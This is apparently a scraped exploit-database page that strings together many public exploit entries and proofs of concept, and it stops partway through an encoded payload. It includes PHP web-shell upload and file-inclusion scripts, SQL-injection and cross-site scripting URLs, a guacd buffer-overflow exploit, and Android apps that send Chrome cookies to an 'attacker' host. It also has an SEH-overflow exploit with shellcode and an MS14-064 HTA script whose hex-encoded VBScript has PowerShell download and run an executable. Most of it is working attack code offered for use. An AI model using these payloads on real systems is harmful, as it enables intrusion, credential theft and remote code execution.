HireHackking

# Exploit Title: Security IP Camera Star Vision DVR Authentication Bypass # Date: 2015-08-13 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: # # Version: All Versions Exploit : 1 - First, open your Chrome browser 2 - Enter the IP address or domain to see the login screen of the camera 3 - Press the F12 key to open the browser console 4 - Click the Console tab and enter the following code login_set(1,1,1,1); 5 - Now go to page view2.html 6 - enjoy seeing camera :) Test : http://m.2.is/ Video Tutorial : http://s3.picofile.com/file/8206365584/cam.mp4.html

// source: https://www.securityfocus.com/bid/55421/info ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code. Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. #include <windows.h> int hijack_poc () { WinExec ( "calc.exe" , SW_NORMAL ); return 0 ; } BOOL WINAPI DllMain ( HINSTANCE hinstDLL , DWORD dwReason , LPVOID lpvReserved ) { hijack_poc () ; return 0 ; }

source: https://www.securityfocus.com/bid/55426/info web@all is prone to a local file-include vulnerability and multiple arbitrary file-upload vulnerabilities. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. web@all 2.0 is vulnerable; other versions may also be affected. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Web@all CMS v2.0 <= (ShellUpload/LFI) Multiple Vulnerabilities # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com | www.inj3ct0rs.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com # Platform/CatID : php - WebApp - Multiple - 0day # Type : Multiple Vulnerabilities # Tested on : Windows XP-SP3 (Fr) / Linux.BackTrack5-rc2 (En) # Founder : [http://webatall.org] ### # <3 <3 Greetings t0 Palestine <3 <3 # Greetings bY {KhalEd Ked'Ans} ^___^ I MiSS yA'll br0thEr'S <3 # n0 d0Rk's Kidd's d0 S0me W0rk's yaa33' -_-" <!-- Proof of Concept ,p0c(1) --> <!-- Shell Upload .PHP --> <?php $uploadfile="inj3ct0r.php"; $ch = curl_init("http://[Target]/[path]/my/kindeditor/php/upload_json.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('imgFile'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> [*] 0r Use TemperDATA ->(/[path]/my/kindeditor/php/upload_json.php) and POST u'R Sh3lL [!] Change inj3ct0r.php -> t0 U'r Sh3lL '_* [+] Access Shell http://[Target]/[path]/file/[ Ym 'dir]/{raW-File-Name}.php <!-- Proof of Concept ,p0c(2) --> <!-- Shell Upload .GIF --> <?php $uploadfile="inj3ct0r.gif"; $ch = curl_init("http://[Target]/[path]/inc/cls_upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('tmp_name'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> [*] 0r Use TemperDATA ->(/[path]/inc/cls_upload.php) and POST u'R Sh3lL [!] Change inj3ct0r.gif -> t0 U'r Sh3lL '_* [+] Access Shell http://[Target]/[path]/file/temp/[ Ym 'dir]/{raW-File-Name}.gif <!-- Proof of Concept ,p0c(3) --> <!-- Local File Include --> <?php $lfi = curl_init("http://[Target]/[path]/my/kindeditor/index.php"); curl_setopt($lfi, CURLOPT_POST, true); curl_setopt($lfi, CURLOPT_POSTFIELDS, array('lang'=>"../../../../../../../../[ LFI ]%00")); curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($lfi); curl_close($lfi); print "$postResult"; ?> [*] 0r Use TemperDATA ->(/[path]/my/kindeditor/index.php) POST and GET s0me Local File's #### << ThE|End -- Go0d'LuCk All .:-'___'-:. #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ, # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs #============================================================================================================

source: https://www.securityfocus.com/bid/55424/info ExtCalendar is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, and steal cookie-based authentication credentials; other attacks are also possible. ExtCalendar 2.0 is vulnerable; other versions may also be affected. http://www.example.com/calendar.php?mode=view&id={SQL} http://www.example.com/calendar.php?mode=cat&cat_id={SQL} http://www.example.com/calendar/cal_popup.php?mode=view&id={SQL}

// source: https://www.securityfocus.com/bid/55462/info GNU glibc is prone to a remote integer-overflow vulnerability which leads to buffer overflow vulnerability. Successful exploits may allow an attacker to execute arbitrary code in the context of a user running an application that uses the affected library. Failed exploit attempts may crash the application, denying service to legitimate users. #include <locale.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #define SIZE 429496730 int main (void) { char *p = malloc (1 + SIZE); if (setlocale (LC_COLLATE, "en_GB.UTF-8") == NULL) { puts ("setlocale failed, cannot test for overflow"); return 0; } if (p == NULL) { puts ("malloc failed, cannot test for overflow"); return 0; } memset (p, 'x', SIZE); p[SIZE] = 0; printf ("%d\n", strcoll (p, p)); return 0; }

source: https://www.securityfocus.com/bid/55478/info DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected. http://www.example.com/phplinks/index.php?catid=[SQL] http://www.example.com/phplinks/review.php?id=[SQL] http://www.example.com/phplinks/search.php?search=[SQL] http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL] http://www.example.com/phplinks/vote.php In POST method : id=[SQL]&rating= http://www.example.com/phplinks/admin/adm_login.php In POST method : admin_password=test&admin_username=[SQL]&submit=Login http://www.example.com/phplinks/login.php In POST method : email=[SQL]&forgotten=&password=[SQL]&submit=Login

source: https://www.securityfocus.com/bid/55476/info VICIDIAL Call Center Suite is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. VICIDIAL Call Center Suite 2.2.1-237 and prior are vulnerable. http://www.example.com/AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07 http://www.example.com/AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4 http://www.example.com/vicidial_demo/user_stats.php?user=2000' and sleep(10)='

source: https://www.securityfocus.com/bid/55469/info Pinterestclones is prone to a security-bypass vulnerability and an HTML-injection vulnerability because it fails to properly validate user permissions and sanitize user-supplied input. An attacker may leverage the HTML-injection issue to inject hostile HTML and script code that would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. The attacker may leverage the security-bypass issue to bypass certain security restrictions and perform unauthorized actions in the affected application. <form action="http://www.example.com/admin/settings.php" method="post" class="niceform" name="frmname" enctype="multipart/form-data"> Name:<input type="text" class="txtFname" name="name" id="name" size="50" value="Admin"/> User Name:<input type="text" class="txtFname" name="uname" readonly="readonly" id="uname" size="50" value="admin@pinterestclones.com"/> New Password:<input type="password" class="txtFname" name="password" id="password" size="50" value=""/> Confirm Password:<input type="password" class="txtFname" name="cpassword" id="cpassword" size="50" value=""/> Site Slogan:<input type="text" name="txtSlogan" id="txtSlogan" size="50" value="Your online pinboard"/> Site URL:<input type="text" name="txtUrl" id="txtUrl" size="50" value=""/> Admin Email:<input type="text" name="aemail" id="aemail" size="50" value=""/> .Under maintenance:<select name="maintenance"> <option value="No" selected>No</option> <option value="Yes">Yes</option> </select> Maintenance message: <input type="text" name="maintenancemsg" id="maintenancemsg" size="50" value="We are upgrading the site."/> <dl class="submit"> <input type="submit" value="Save" class="submit" name="sbmtbtn" style="width:50px;"/> </form>

source: https://www.securityfocus.com/bid/55487/info The Download Monitor plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Download Monitor 3.3.5.7 is vulnerable; other versions may also be affected. GET /wp/?dlsearch=">alert('xsstest') HTTP/1.1

source: https://www.securityfocus.com/bid/55500/info Openfiler is prone to multiple cross-site scripting and information disclosure vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Openfiler versions 2.3, 2.99.1 and 2.99.2 are vulnerable; other versions may also be affected. https://www.example.com/admin/system.html?step=2&device="><script>alert(document.cookie);</script><p+" https://www.example.com/admin/volumes_iscsi_targets.html?targetName="><script>alert(document.cookie);</script><p+" https://www.example.com/phpinfo.html https://www.example.com/uptime.html

source: https://www.securityfocus.com/bid/55497/info libguac is prone to a remote buffer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. #!/usr/bin/python # CVE-2012-4415: PoC for guacd buffer overflow vulnerability # # Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi> # # Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with # default configuration. Uses return-to-libc to bypass non-executable # stack. # import socket, struct PROTOCOL_ADDRESS = 0xbf807e9f SYSTEM_ADDRESS = 0xb76e7640 class GuacdPOC: def __init__(self, command): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.connect(('localhost', 4822)) self.s("select") self.c(",") protocol = (command + "; " + "#" * 265)[:265] protocol += struct.pack("L", PROTOCOL_ADDRESS) protocol += struct.pack("L", SYSTEM_ADDRESS) self.s(protocol) self.c(";") def s(self, x): self.sock.send("%d.%s" % (len(x), x)) def c(self, x): self.sock.send(x) GuacdPOC("touch /tmp/owned")

source: https://www.securityfocus.com/bid/55504/info FBDj is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/stats/playerdetails.php?id=5' http://www.example.com/warstats/playerdetails.php?id=13' http://www.example.com/playerdetails.php?id=9' http://www.example.com/il2-stats/playerdetails.php?id=29'

source: https://www.securityfocus.com/bid/55509/info Atlassian Confluence is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Atlassian Confluence versions prior to 4.1.9 are vulnerable. http://www.example.com/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm

source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible. Versions prior to Chrome for Android 18.0.1025308 are vulnerable. package jp.mbsd.terada.attackchrome1; import android.app.Activity; import android.os.Bundle; import android.content.Intent; import android.net.Uri; public class Main extends Activity { @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); doit(); } // get intent to invoke the chrome app public Intent getIntentForChrome(String url) { Intent intent = new Intent("android.intent.action.VIEW"); intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main"); intent.setData(Uri.parse(url)); return intent; } public void doit() { try { // At first, force the chrome app to open a target Web page Intent intent1 = getIntentForChrome("http://www.google.com/1"); startActivity(intent1); // wait a few seconds Thread.sleep(3000); // JS code to inject into the target (www.google.com) String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');" + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);" + "document.body.appendChild(img);"; Intent intent2 = getIntentForChrome(jsURL); // Trick to prevent Chrome from opening the JS URL in a different tab intent2.putExtra("com.android.browser.application_id", "com.android.chrome"); intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP); // Inject JS into the target Web page startActivity(intent2); } catch (Exception e) {} } }

source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible. Versions prior to Chrome for Android 18.0.1025308 are vulnerable. // This is a part of malicious Android app. public void attack() { try { // let Chrome app load its Cookies file, so that Chrome app // automatically save it to /sdcard/Download/ directory. Intent intent = new Intent("android.intent.action.VIEW"); intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main"); intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies")); startActivity(intent); // wait a few seconds Thread.sleep(3000); // read the Cookie file (/sdcard/Download/Cookies.bin) FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin"); ... }

source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible. Versions prior to Chrome for Android 18.0.1025308 are vulnerable. package jp.mbsd.terada.attackchrome1; import android.app.Activity; import android.os.Bundle; import android.util.Log; import android.content.Intent; import android.net.Uri; public class Main extends Activity { // TAG for logging. public final static String TAG = "attackchrome1"; // Cookie file path of Chrome. public final static String CHROME_COOKIE_FILE_PATH = "/data/data/com.android.chrome/app_chrome/Default/Cookies"; // Temporaly directory in which the symlink will be created. public final static String MY_TMP_DIR = "/data/data/jp.mbsd.terada.attackchrome1/tmp/"; // The path of the Symlink (must have "html" extension) public final static String LINK_PATH = MY_TMP_DIR + "cookie.html"; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); doit(); } // Method to invoke Chrome. public void invokeChrome(String url) { Intent intent = new Intent("android.intent.action.VIEW"); intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main"); intent.setData(Uri.parse(url)); startActivity(intent); } // Method to execute OS command. public void cmdexec(String[] cmd) { try { Runtime.getRuntime().exec(cmd); } catch (Exception e) { Log.e(TAG, e.getMessage()); } } // Main method. public void doit() { try { // Create the symlink in this app's temporary directory. // The symlink points to Chrome's Cookie file. cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR}); cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH}); cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR}); Thread.sleep(1000); // Force Chrome to load attacker's web page to poison Chrome's Cookie file. // Suppose the web page sets a Cookie as below. // x=<img><script>document.images[0].src='http://attacker/?' // +encodeURIComponent(document.body.innerHTML)</script>; // expires=Tue, 01-Jan-2030 00:00:00 GMT String url1 = "http://attacker/set_malicious_cookie.php"; invokeChrome(url1); Thread.sleep(10000); // Force Chrome to load the symlink. // Chrome renders the content of the Cookie file as HTML. String url2 = "file://" + LINK_PATH; invokeChrome(url2); } catch (Exception e) { Log.e(TAG, e.getMessage()); } } }

source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible. Versions prior to Chrome for Android 18.0.1025308 are vulnerable. <body> <u>Wait a few seconds.</u> <script> function doitjs() { var xhr = new XMLHttpRequest; xhr.onload = function() { alert(xhr.responseText); }; xhr.open('GET', document.URL); xhr.send(null); } setTimeout(doitjs, 8000); </script> </body>

#!/usr/bin/env python # # Exploit Title: XMPlay .pls Local Crash poc # Date: 2015-08-16 # Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: http://www.un4seen.com/ # Software Link: http://www.un4seen.com/download.php?xmplay38 # Version: 3.8.1.12 # Tested on: Windows 7 # # Stack Overflowing xmplay, but we can't # rewrite any register ou SE Handler def generateCrash(): crash="""[playlist] numberofentries=1 file1=""" crash+="pwned"*1000000 return crash try: f=open("xmplay.pls","w") f.write(generateCrash()) f.close print "Evil xmplay.pls generated!" except: print "I can't create file :/"

#!/usr/bin/env python # # Exploit Title: MASM32 quick editor .QSE SEH Based Buffer Overflow (ASLR & SAFESEH bypass) # Date: 2015-08-15 # Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: http://www.masm32.com/ # Software Link: http://www.masm32.com/masmdl.htm # Version: MASM32 11 qeditor 4.0g # Tested on: Windows 7 # from struct import pack import sys # 95 bytes Little Joke shellcode :p (shutdown) # The shellcode must be printable shellcode="" shellcode+="\x89\xE3" shellcode+="\xDB\xC2" shellcode+="\xD9\x73\xF4" shellcode+="\x5E" shellcode+="VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF" shellcode+="THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D" shellcode+="QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1" shellcode+="CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI" shellcode+="NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA" nop="\x90"*(1140-35) # Destination of jump: qeditor add 8C opcode (mov in assembly) which crash qeditor bypass="\xe2" # with the nop (8C90 90909090) to bypass this we can use different opcodes. endnop="\x90"*34 # The opcode e2 make the instruction 8ce2 (MOV DX,FS) and the execution flow nop+=bypass+endnop # can be continued junk="\x90"*(1704-95) # Junk after shellcode padding='\x62'*52 # 52 bytes available after SE Handler jump="\xe9\x14\xf5\xff\xff" # jump to the nop nseh="\xeb\xf9\x90\x90" # jump to previous instruction seh=pack("<I",0x00406a25) # asciiprint: pop edi pop esi ret (C:\masm32\qeditor.exe) payload=nop+shellcode+junk+jump+nseh+seh+padding try: f=open("evil.qse","w") f.write(payload) f.close() print "Evil QSE script created!\nHack'n'Roll" except: print "Can't create Evil QSE script :'(" sys.exit(0)

#!/usr/bin/php <?php # Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # MS14-064 # # # 1 . run php code : php hta.php # 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip) # 3 . open poc.hta # 4 . Your Link Download/Execute on your target # 5 . Finished ;) # # Demo : http://youtu.be/Vkswz7vt23M # $port=80; # Port Address $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link print " Mohammad Reza Espargham\n\n\n"; $host= gethostname(); #g3th0stn4m3 $ip = gethostbyname($host); #g3th0stbyn4m3 print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n"; $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,$port); socket_listen($reza); $msgd = "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76". "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65". "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68". "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20". "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63". "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75". "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20". "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62". "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22". "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65". "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65". "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61". "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c". "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d". "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53". "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b". "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70". "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e". "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61". "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73". "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55". "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61". "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78". "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20". "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a". "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28". "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a". "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a". "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65". "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20". "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69". "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e". "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20". "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a". "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61". "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68". 